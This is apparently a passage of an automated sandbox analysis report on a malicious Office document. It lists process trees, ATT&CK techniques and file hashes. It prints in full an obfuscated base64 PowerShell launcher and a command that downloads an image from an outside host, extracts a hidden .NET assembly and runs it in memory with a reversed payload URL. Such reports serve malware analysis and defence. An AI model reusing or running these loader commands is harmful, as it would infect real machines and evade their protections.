⥥g㌔ ䷗ ⯍ ⍠ ⥥D0㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥Gk㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥Gc㌔ ䷗ ⯍ ⍠ ⥥ZQBU㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥e㌔ ䷗ ⯍ ⍠ ⥥B0㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥UwB1㌔ ䷗ ⯍ ⍠ ⥥GI㌔ ䷗ ⯍ ⍠ ⥥cwB0㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥aQBu㌔ ䷗ ⯍ ⍠ ⥥Gc㌔ ䷗ ⯍ ⍠ ⥥K㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bh㌔ ䷗ ⯍ ⍠ ⥥HI㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BJ㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥Hg㌔ ䷗ ⯍ ⍠ ⥥L㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥YgBh㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥ZQ㌔ ䷗ ⯍ ⍠ ⥥2㌔ ䷗ ⯍ ⍠ ⥥DQ㌔ ䷗ ⯍ ⍠ ⥥T㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥ZwB0㌔ ䷗ ⯍ ⍠ ⥥Gg㌔ ䷗ ⯍ ⍠ ⥥KQ㌔ ䷗ ⯍ ⍠ ⥥7㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥YwBv㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥BC㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥9㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥WwBT㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥cwB0㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥EM㌔ ䷗ ⯍ ⍠ ⥥bwBu㌔ ䷗ ⯍ ⍠ ⥥HY㌔ ䷗ ⯍ ⍠ ⥥ZQBy㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥XQ㌔ ䷗ ⯍ ⍠ ⥥6㌔ ䷗ ⯍ ⍠ ⥥Do㌔ ䷗ ⯍ ⍠ ⥥RgBy㌔ ䷗ ⯍ ⍠ ⥥G8㌔ ䷗ ⯍ ⍠ ⥥bQBC㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥cwBl㌔ ䷗ ⯍ ⍠ ⥥DY㌔ ䷗ ⯍ ⍠ ⥥N㌔ ䷗ ⯍ ⍠ ⥥BT㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥cgBp㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Zw㌔ ䷗ ⯍ ⍠ ⥥o㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥YgBh㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥ZQ㌔ ䷗ ⯍ ⍠ ⥥2㌔ ䷗ ⯍ ⍠ ⥥DQ㌔ ䷗ ⯍ ⍠ ⥥QwBv㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥p㌔ ䷗ ⯍ ⍠ ⥥Ds㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bs㌔ ䷗ ⯍ ⍠ ⥥G8㌔ ䷗ ⯍ ⍠ ⥥YQBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥BB㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥cwBl㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥YgBs㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥9㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥WwBT㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥cwB0㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥FI㌔ ䷗ ⯍ ⍠ ⥥ZQBm㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥ZQBj㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥aQBv㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥LgBB㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥cwBl㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥YgBs㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥XQ㌔ ䷗ ⯍ ⍠ ⥥6㌔ ䷗ ⯍ ⍠ ⥥Do㌔ ䷗ ⯍ ⍠ ⥥T㌔ ䷗ ⯍ ⍠ ⥥Bv㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥o㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥YwBv㌔ ䷗ ⯍ ⍠ ⥥G0㌔ ䷗ ⯍ ⍠ ⥥bQBh㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥BC㌔ ䷗ ⯍ ⍠ ⥥Hk㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bl㌔ ䷗ ⯍ ⍠ ⥥HM㌔ ䷗ ⯍ ⍠ ⥥KQ㌔ ䷗ ⯍ ⍠ ⥥7㌔ ䷗ ⯍ ⍠ ⥥CQ㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥B5㌔ ䷗ ⯍ ⍠ ⥥H㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥ZQ㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥D0㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥bwBh㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥ZQBk㌔ ䷗ ⯍ ⍠ ⥥EE㌔ ䷗ ⯍ ⍠ ⥥cwBz㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥bQBi㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥eQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Ec㌔ ䷗ ⯍ ⍠ ⥥ZQB0㌔ ䷗ ⯍ ⍠ ⥥FQ㌔ ䷗ ⯍ ⍠ ⥥eQBw㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥K㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥n㌔ ䷗ ⯍ ⍠ ⥥GQ㌔ ䷗ ⯍ ⍠ ⥥bgBs㌔ ䷗ ⯍ ⍠ ⥥Gk㌔ ䷗ ⯍ ⍠ ⥥Yg㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Ek㌔ ䷗ ⯍ ⍠ ⥥Tw㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Eg㌔ ䷗ ⯍ ⍠ ⥥bwBt㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥Jw㌔ ䷗ ⯍ ⍠ ⥥p㌔ ䷗ ⯍ ⍠ ⥥Ds㌔ ䷗ ⯍ ⍠ ⥥J㌔ ䷗ ⯍ ⍠ ⥥Bt㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bo㌔ ䷗ ⯍ ⍠ ⥥G8㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥D0㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥eQBw㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥LgBH㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥BN㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bo㌔ ䷗ ⯍ ⍠ ⥥G8㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥o㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥VgBB㌔ ䷗ ⯍ ⍠ ⥥Ek㌔ ䷗ ⯍ ⍠ ⥥Jw㌔ ䷗ ⯍ ⍠ ⥥p㌔ ䷗ ⯍ ⍠ ⥥C4㌔ ䷗ ⯍ ⍠ ⥥SQBu㌔ ䷗ ⯍ ⍠ ⥥HY㌔ ䷗ ⯍ ⍠ ⥥bwBr㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥K㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥k㌔ ䷗ ⯍ ⍠ ⥥G4㌔ ䷗ ⯍ ⍠ ⥥dQBs㌔ ䷗ ⯍ ⍠ ⥥Gw㌔ ䷗ ⯍ ⍠ ⥥L㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥g㌔ ䷗ ⯍ ⍠ ⥥Fs㌔ ䷗ ⯍ ⍠ ⥥bwBi㌔ ䷗ ⯍ ⍠ ⥥Go㌔ ䷗ ⯍ ⍠ ⥥ZQBj㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥WwBd㌔ ䷗ ⯍ ⍠ ⥥F0㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥o㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥B4㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥LgBT㌔ ䷗ ⯍ ⍠ ⥥FM㌔ ䷗ ⯍ ⍠ ⥥SwBN㌔ ䷗ ⯍ ⍠ ⥥Eg㌔ ䷗ ⯍ ⍠ ⥥Lw㌔ ䷗ ⯍ ⍠ ⥥w㌔ ䷗ ⯍ ⍠ ⥥DU㌔ ䷗ ⯍ ⍠ ⥥Mg㌔ ䷗ ⯍ ⍠ ⥥v㌔ ䷗ ⯍ ⍠ ⥥D㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥NQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥Dk㌔ ䷗ ⯍ ⍠ ⥥O㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥D㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥OQ㌔ ䷗ ⯍ ⍠ ⥥u㌔ ䷗ ⯍ ⍠ ⥥DU㌔ ䷗ ⯍ ⍠ ⥥N㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥v㌔ ䷗ ⯍ ⍠ ⥥C8㌔ ䷗ ⯍ ⍠ ⥥OgBw㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥d㌔ ䷗ ⯍ ⍠ ⥥Bo㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥s㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥JwBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥cwBh㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥aQB2㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bv㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥s㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥JwBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥cwBh㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥aQB2㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bv㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥I㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥s㌔ ䷗ ⯍ ⍠ ⥥C㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥JwBk㌔ ䷗ ⯍ ⍠ ⥥GU㌔ ䷗ ⯍ ⍠ ⥥cwBh㌔ ䷗ ⯍ ⍠ ⥥HQ㌔ ䷗ ⯍ ⍠ ⥥aQB2㌔ ䷗ ⯍ ⍠ ⥥GE㌔ ䷗ ⯍ ⍠ ⥥Z㌔ ䷗ ⯍ ⍠ ⥥Bv㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥L㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥n㌔ ䷗ ⯍ ⍠ ⥥FI㌔ ䷗ ⯍ ⍠ ⥥ZQBn㌔ ䷗ ⯍ ⍠ ⥥EE㌔ ䷗ ⯍ ⍠ ⥥cwBt㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥L㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥n㌔ ䷗ ⯍ ⍠ ⥥Cc㌔ ䷗ ⯍ ⍠ ⥥KQ㌔ ䷗ ⯍ ⍠ ⥥p㌔ ䷗ ⯍ ⍠ ⥥㌔ ䷗ ⯍ ⍠ ⥥==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('㌔ ䷗ ⯍ ⍠ ⥥','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SSKMH/052/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
fd4949d194b085e9ca9f0438186313e1

SHA1
853ab224005c98aedc24b286dee1f17bc5abe835

SHA256
218b0c8b5b2b0f2627bb490d79677c5648f88dc97e8c2910e5de8c4b175839e0

SHA512
0eaee1f62edee27fd7331d0a939a2b31ec69e193f9ca8d2d27c6e23e62b47bbb3c626d1aa8b5d70fe69c8abfc51955d655ca43a6ba02ac308d1cbdb65d18f081

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
2478325a2b00d1460ac15879dcafd971

SHA1
165eca0b325794934408be0bd3c7f9b563ffbb45

SHA256
aad2e51f70d94f3ac34a905a4af99ce06850ff6bc6ac42133999cf8817844aaf

SHA512
f33eff562690968c3c2e9e521db3435856dea93607cf0ffa73a57f367a2f6307b77af4d059a22b5b4d45c40fd8a4d668c863d67781cbda6835f8f93ec303e391

Download Submit
C:\Users\Admin\AppData\Roaming\butterfoodgoodforhealthbetterfood.vBS

Filesize
179KB

MD5
231640b84e8195c81cba8d88254fde82

SHA1
ee23e723afd1c83be378f0a4e5476fa7becc8e38

SHA256
b131e3acd26076e1d327d6ef2880da420719f636cc3474a9760fb50b748ec51a

SHA512
587a4ed40fea73fc61a6d3c12a1f0107c6a793ef38b36e715469d467a29b54d09e4d3dfa15e0f5f24074d2da238a3d3edb5defddfbd78389ab9684c8829a3480

Download Submit
memory/2544-19-0x0000000005640000-0x000000000567A000-memory.dmp

Filesize
232KB

Download
memory/3068-0-0x000000002FD71000-0x000000002FD72000-memory.dmp

Filesize
4KB

Download
memory/3068-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3068-2-0x0000000073D1D000-0x0000000073D28000-memory.dmp

Filesize
44KB

Download
memory/3068-20-0x0000000073D1D000-0x0000000073D28000-memory.dmp

Filesize
44KB

Download
memory/3068-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing